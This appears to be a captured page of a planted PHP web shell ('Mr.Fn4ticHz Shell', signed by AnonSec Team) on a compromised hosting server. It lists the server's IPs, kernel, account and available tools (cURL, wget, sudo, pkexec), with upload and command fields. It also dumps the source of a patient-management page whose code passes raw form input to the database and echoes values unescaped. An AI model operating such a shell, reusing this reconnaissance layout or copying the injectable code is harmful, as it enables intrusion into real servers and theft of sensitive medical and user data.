Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.144.15.154
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/tryselect.php
<?php session_start();
require_once("../patientmanager.php");
require_once("../DBManager.php");
include 'header.php';
include 'menu.php';
if(isset($_POST[submit]))

	{
		PatientManager::nwinvestigation("$_POST[patientid]","$_POST[Investigation]","$_POST[Result]","$_POST[Evidence]","$_POST[enteredby]");
	 }

?>

 <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
<div class="card-body">
        
        <!DOCTYPE html>
<html>
<head>

<link rel="stylesheet" href="select2.min.css" />
<style>
.select2-dropdown {top: 22px !important; left: 8px !important;}
</style>
</head>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<body>

  
 

   <form method="post"  name="submit">
    <table width="532" border="3">
	<table id="example2" class="table table-bordered table-hover">  
      <tbody>
	           
          
                  <tr>
          <td>Investigation</td>
          <td><select name="Investigation" id="country">
              <?php
	$sql ="SELECT * FROM site_users";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    
		 echo "<option value='$rs[uname]'>$rs[uname]</option> ";
		    }
		    ?>
	    
</select></td>
        </tr>
		        <tr>
          <td colspan="2" align="center"><input type="submit" name="submit" id="submit" value="Add"/></td>
        </tr>
        <div class="clear"></div>
      </tbody>
    </table>
    </form>
   
<script src="select2.min.js"></script>
<script>
$("#country").select2( {
	placeholder: "Medical Condition",
	allowClear: true
	} );
</script>

Anon7 - 2022
AnonSec Team